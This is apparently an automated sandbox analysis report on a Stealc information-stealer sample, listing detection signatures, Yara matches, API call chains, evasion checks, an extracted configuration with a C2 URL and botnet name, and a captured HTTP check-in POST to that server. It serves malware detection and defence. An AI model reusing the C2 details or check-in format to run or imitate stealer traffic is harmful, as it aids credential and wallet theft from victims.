
Windows Analysis Report
is65NMeWkV.exe

Overview

General Information

Sample name: is65NMeWkV.exe (renamed because the original name is a hash value)
Original sample name: 5d0d37171e8ed9fc0b97e8f858133802.exe
Analysis ID: 1541240
MD5: 5d0d37171e8ed9fc0b97e8f858133802
SHA1: f0b9f7060cd7e857d53a740e7e025d4d75f7ab27
SHA256: 0d90d3771d5a6c15760e18a6f2a542076d7c7c73c02d31c33dfee2f6f7bed61c
Tags: exe, Stealc, user-abuse_ch

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • is65NMeWkV.exe (PID: 8 cmdline: "C:\Users\user\Desktop\is65NMeWkV.exe" MD5: 5D0D37171E8ED9FC0B97E8F858133802)
    • WerFault.exe (PID: 3260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 1220 MD5: C31336C1EFC2CCB44B4326EA793040F2)
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration:
{"C2 url": "http://109.107.157.208/49aaa1bd4c594849.php", "Botnet": "LogsDiller"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1898042742.00000000007F0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1866:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1700998276.0000000002350000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
(3 further entries not shown)

Source | Rule | Description | Author | Strings
0.2.is65NMeWkV.exe.2300e67.3.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.is65NMeWkV.exe.400000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.3.is65NMeWkV.exe.2350000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.is65NMeWkV.exe.400000.0.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.3.is65NMeWkV.exe.2350000.0.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
(1 further entry not shown)

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T15:57:02.114246+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 109.107.157.208 | 80 | TCP



                      AV Detection

Source: is65NMeWkV.exe | Avira: detected
Source: 00000000.00000003.1700998276.0000000002350000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://109.107.157.208/49aaa1bd4c594849.php", "Botnet": "LogsDiller"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: is65NMeWkV.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0230CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_02319107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_023074A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_02309D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_02309DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree

                      Compliance

Source: C:\Users\user\Desktop\is65NMeWkV.exe | Unpacked PE file: 0.2.is65NMeWkV.exe.400000.0.unpack
Source: is65NMeWkV.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\is65NMeWkV.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_02313B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_02314B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0230E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0230C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_02301937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0230F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_02314107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0230E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0230EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_023147D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0230DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose

                      Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 109.107.157.208:80
Source: Malware configuration extractor | URLs: http://109.107.157.208/49aaa1bd4c594849.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 109.107.157.208
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /49aaa1bd4c594849.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IIEHJEHDBGHIDGDGHCBG
    Host: 109.107.157.208
    Content-Length: 217
    Connection: Keep-Alive
    Cache-Control: no-cache

    ------IIEHJEHDBGHIDGDGHCBG
    Content-Disposition: form-data; name="hwid"

    AB740080102F2420325575
    ------IIEHJEHDBGHIDGDGHCBG
    Content-Disposition: form-data; name="build"

    LogsDiller
    ------IIEHJEHDBGHIDGDGHCBG--
Source: Joe Sandbox View | ASN Name: VECTRANET-AS (Al Zwyciestwa 253, 81-525 Gdynia, Poland, PL)
Source: unknown | TCP traffic detected without corresponding DNS query: 109.107.157.208
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://109.107.157.208
Source: is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp, is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://109.107.157.208/
Source: is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://109.107.157.208/49aaa1bd4c594849.php
Source: is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://109.107.157.208/49aaa1bd4c594849.php(K
Source: is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008BC000.00000004.00000020.00020000.00000000.sdmp, is65NMeWkV.exe, 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://109.107.157.208/49aaa1bd4c594849.php/
Source: is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://109.107.157.208/49aaa1bd4c594849.phplK
Source: is65NMeWkV.exe, 00000000.00000002.1898071259.00000000008B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://109.107.157.208/ws
Source: Amcache.hve.3.dr | String found in binary or memory: http://upx.sf.net

                      System Summary

Source: 00000000.00000002.1898042742.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0232D257
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0232CEFF
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0233370B
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 1220
Source: 00000000.00000002.1898042742.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: is65NMeWkV.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@2/5@0/1
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\is65NMeWkV.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\61Z58F0V.htm
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\6d718c56-cfe2-4c72-b654-e2110d8119df
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\is65NMeWkV.exe "C:\Users\user\Desktop\is65NMeWkV.exe"
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

                      Data Obfuscation

Source: C:\Users\user\Desktop\is65NMeWkV.exe | Unpacked PE file: 0.2.is65NMeWkV.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0041B035 push ecx; ret 0_2_0041B048
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_007F5E73 push eax; ret 0_2_007F5E91
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_007F2EA2 push 7DD07DC0h; iretd 0_2_007F2EB3
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_007F5E82 push eax; ret 0_2_007F5E91
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0231B29C push ecx; ret 0_2_0231B2AF
Source: is65NMeWkV.exe | Static PE information: section name: .text entropy: 7.012763407505116
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

Source: C:\Users\user\Desktop\is65NMeWkV.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-28979
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Evaded block: after key decision graph_0-30140
Source: C:\Users\user\Desktop\is65NMeWkV.exe | API coverage: 6.5 %
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_02313B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_02313B17
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_02314B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02314B77
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0230E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0230E077
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0230C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0230C0D7
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_02301937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02301937
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_0230F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0230F917
Source: C:\Users\user\Desktop\is65NMeWkV.exe | Code function: 0_2_02314107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_02314107
